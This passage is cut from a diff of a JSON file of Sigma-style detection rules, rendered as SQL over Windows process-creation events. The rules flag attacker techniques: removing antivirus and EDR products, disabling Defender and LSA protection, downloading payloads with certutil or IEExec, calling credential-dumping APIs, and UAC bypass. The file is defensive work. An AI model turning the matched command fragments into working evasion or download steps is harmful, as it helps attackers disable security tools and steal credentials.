'%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "title": "Suspicious Microsoft Office Child Process", + "id": "438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "status": "experimental", - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Detects execution of the IEExec utility to download payloads", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_lolbin_ieexec_download.yml" + }, + { + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "status": "experimental", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.010" ], "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" + "Authorized administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", - "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "title": "Potential WinAPI Calls Via CommandLine", + "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "status": "experimental", + "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" - ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" - }, - { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", - "status": "experimental", - "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1055" + "attack.t1027", + "attack.t1620" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", - "status": "experimental", - "description": "Detects the execution of a renamed office binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", + "status": "test", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "status": "test", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' 